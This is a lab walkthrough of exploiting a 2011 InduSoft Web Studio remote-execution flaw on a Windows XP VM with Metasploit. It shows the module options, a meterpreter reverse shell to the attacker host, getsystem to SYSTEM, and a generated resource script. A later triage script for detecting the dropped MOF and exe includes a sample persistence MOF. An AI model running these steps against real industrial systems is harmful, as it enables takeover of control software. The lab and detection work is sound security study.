1. Environment setup
With some spare time on my hands I set out to reproduce a 2011 ICS CVE; in practice the bug is more web-style than anything else.
It is also a chance to get reacquainted with HMI and SCADA software.
Target: Windows XP (192.168.183.160)
Attacker: Kali (192.168.183.139)
Industrial software and version: InduSoft Web Studio v7.1
Exploit: https://www.exploit-db.com/exploits/21837
Installer download: https://indusoft-web-studio.software.informer.com/7.1/
Installation walkthrough: http://www.opdown.com/soft/92899.html
Install InduSoft Web Studio v7.1 on the target. Once it is installed, open Remote Agent and click Start.
That brings up the main screen.
This HMI integrates a number of realistic industrial scenarios, for example gas collection,
an automated robotic arm,
and wind-power monitoring; it also records the operating system and the logged-in user. For software that is ten years old it is genuinely well done.
Now check which ports are in use on the target (for example with netstat -ano).
Port 4322 is listening.
On the Kali side, drop the downloaded exploit module into the Metasploit module directory shown,
then fetch the exploit itself.
Current Metasploit releases already ship this module as exploit/windows/scada/indusoft_webstudio_exec; install it only if your copy lacks it.
The exploit at https://www.exploit-db.com/exploits/21837 was written and tested against InduSoft Web Studio v6.1 SP6. Since v6.1 is now hard to find, this article uses InduSoft Web Studio v7.1 instead; I tested it myself and v7.1 works as well.
The exploit shows that the attack goes through port 4322, so the corresponding service (the Remote Agent) must be started in InduSoft Web Studio v7.1 before running it.
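Before launching the module it is worth confirming that the Remote Agent is actually reachable on 4322/TCP, since that is the only thing the exploit talks to. The script below is an added example, not part of the original write-up or of Metasploit: it checks the port and writes a msfconsole resource script with the same options the page uses (module, payload, RHOSTS, RPORT 4322, LHOST, LPORT 7777). The addresses are the ones from this lab; the output file name iws.rc is my choice.

```python
"""Pre-flight check for the InduSoft Web Studio Remote Agent (4322/TCP) and a
Metasploit resource script reproducing the steps on this page. Added example;
the IPs are this lab's, the file name iws.rc is an assumption."""
import socket


def remote_agent_listening(host, port=4322, timeout=2.0):
    """Return True if host:port accepts a TCP connection.

    The module talks only to the Remote Agent on 4322/TCP, so when this
    returns False the exploit cannot do anything useful: the agent has to be
    started by hand from the IWS GUI (Remote Agent -> Start) first.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, host unreachable
        return False


def build_msf_rc(rhost, lhost, lport=7777, rport=4322):
    """Return a msfconsole resource script with the options used on this page."""
    lines = [
        "use exploit/windows/scada/indusoft_webstudio_exec",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        f"set RHOSTS {rhost}",
        f"set RPORT {rport}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        # -j runs the exploit as a background job so the reverse handler stays
        # up; the session only arrives once the target has processed the
        # dropped .mof file, which does not happen instantly.
        "exploit -j",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    target, attacker = "192.168.183.160", "192.168.183.139"
    if remote_agent_listening(target):
        with open("iws.rc", "w") as f:
            f.write(build_msf_rc(target, attacker))
        print("4322/tcp open; run: msfconsole -q -r iws.rc")
    else:
        print("4322/tcp closed: start Remote Agent on the target first")
```

Run it from Kali with the target powered on; if it reports the port closed, go back to the IWS GUI and start the Remote Agent rather than retrying the module.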
msf6 > use exploit/windows/scada/indusoft_webstudio_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/scada/indusoft_webstudio_exec) > options
Module options (exploit/windows/scada/indusoft_webstudio_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   4322             yes       The target port (TCP)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.183.139  yes       The listen address (an interface may be specified)
   LPORT     7777             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP / 2003
msf6 exploit(windows/scada/indusoft_webstudio_exec) > run
[*] Started reverse TCP handler on 192.168.183.139:7777
[*] 192.168.183.160:4322 - 192.168.183.160:4322 - Uploading the exe payload to C:\WINDOWS\system32\cBlTPNrXsabYq.exe
[+] 192.168.183.160:4322 - 192.168.183.160:4322 - The exe payload has been uploaded successfully
[*] 192.168.183.160:4322 - 192.168.183.160:4322 - Uploading the mof file to c:\WINDOWS\system32\wbem\mof\LUivMnxSNqx.mof
[+] 192.168.183.160:4322 - 192.168.183.160:4322 - The mof file has been uploaded successfully
[*] Exploit completed, but no session was created.
At this point both files have been dropped but no session has come back. The module does not execute anything directly: it writes the payload exe into system32 and a MOF file into system32\wbem\mof, and it is the target's WMI service (Windows Management Instrumentation) that compiles the MOF and launches the exe, which is why the target list is limited to Windows XP / 2003. That service therefore has to be running on the target; once it is, the session arrives and privilege escalation can begin.
Run getsystem, then type shell to execute commands; at this point we are SYSTEM.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2204 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
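The session output above also tells a defender what to look for afterwards: a randomly named exe in system32 and a .mof in system32\wbem\mof. On XP/2003 the WMI service compiles any .mof that appears in that directory, executes what it declares, and moves the file into wbem\mof\good (or wbem\mof\bad when compilation fails), so the file is not where it was dropped by the time anyone looks. The triage script below is an added example, not part of the original write-up: pointed at a copy or mounted image of the target's WINDOWS directory it reports every .mof in those directories that declares an ActiveScriptEventConsumer (the WMI class that runs a script when its event filter fires), the .exe paths the script references, and whether those exes still exist in system32. The demo tree and the MOF text it contains are constructed; the file names are the ones from this run.

```python
"""Triage script for the on-disk artifacts of the exploit on this page (added
example, not from the original write-up). Walks the WMI auto-compile
directories under a WINDOWS root and reports MOF files that declare a script
consumer. The demo tree built by build_demo_tree() is constructed."""
import re
from pathlib import Path

# Drop directory watched by winmgmt, plus where it moves processed files (XP/2003)
MOF_DIRS = ("system32/wbem/mof", "system32/wbem/mof/good", "system32/wbem/mof/bad")
# A Windows path ending in .exe inside a MOF string literal (backslashes doubled)
EXE_RE = re.compile(r"[A-Za-z]:[\w\\.\-]+?\.exe", re.IGNORECASE)

# Constructed MOF in the shape used for this technique: an event filter, a
# VBScript consumer that runs the dropped exe, and the binding between them.
DEMO_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $Filter {
  EventNamespace = "Root\\Cimv2";
  Name = "filtP";
  Query = "Select * From __InstanceModificationEvent Where TargetInstance Isa \"Win32_LocalTime\"";
  QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
  Name = "consP";
  ScriptingEngine = "VBScript";
  ScriptText = "Set s = CreateObject(\"WScript.Shell\")\ns.Run \"C:\\WINDOWS\\system32\\cBlTPNrXsabYq.exe\", 0, False\n";
};
instance of __FilterToConsumerBinding {
  Consumer = $Consumer;
  Filter = $Filter;
};
'''
# Constructed benign MOF: a plain class definition, no consumer, no exe
BENIGN_MOF = r'''#pragma namespace("\\\\.\\root\\cimv2")
class Demo_Benign { [key] string Name; };
'''


def scan_mof(text):
    """Return (has_script_consumer, exe_paths) for one MOF file's text.
    Doubled backslashes from the MOF string literal are collapsed."""
    has_consumer = "ActiveScriptEventConsumer" in text
    exes = sorted({m.replace("\\\\", "\\") for m in EXE_RE.findall(text)})
    return has_consumer, exes


def find_mof_drop_artifacts(windows_root):
    """Return one dict per .mof under MOF_DIRS that declares a script consumer:
    its path relative to windows_root, the exe paths it references, and
    whether each exe is still present in system32."""
    root = Path(windows_root)
    findings = []
    for d in MOF_DIRS:
        if not (root / d).is_dir():
            continue
        for mof in sorted((root / d).glob("*.mof")):
            has_consumer, exes = scan_mof(mof.read_text(errors="replace"))
            if not has_consumer:
                continue
            findings.append({
                "mof": mof.relative_to(root).as_posix(),
                "exes": exes,
                "exe_present": [(root / "system32" / e.rsplit("\\", 1)[-1]).is_file()
                                for e in exes],
            })
    return findings


def build_demo_tree(base):
    """Create a constructed WINDOWS tree in the state left by the run on this
    page: payload exe in system32, the compiled .mof moved to wbem\mof\good,
    and an unrelated benign .mof still sitting in wbem\mof."""
    base = Path(base)
    (base / "system32/wbem/mof/good").mkdir(parents=True)
    (base / "system32/cBlTPNrXsabYq.exe").write_bytes(b"MZ demo payload")
    (base / "system32/wbem/mof/good/LUivMnxSNqx.mof").write_text(DEMO_MOF)
    (base / "system32/wbem/mof/benign.mof").write_text(BENIGN_MOF)
    return base


if __name__ == "__main__":
    import sys
    import tempfile
    root = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree(tempfile.mkdtemp())
    for finding in find_mof_drop_artifacts(root):
        print(finding)
```

With no argument it scans its own demo tree; pass the path of a mounted image's WINDOWS directory to run it against a real host. A hit in wbem\mof\good means the consumer was compiled and registered, so the WMI subscription itself (not only the files) has to be cleaned up.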
Reference: https://www.freebuf.com/articles/ics-articles/256862.html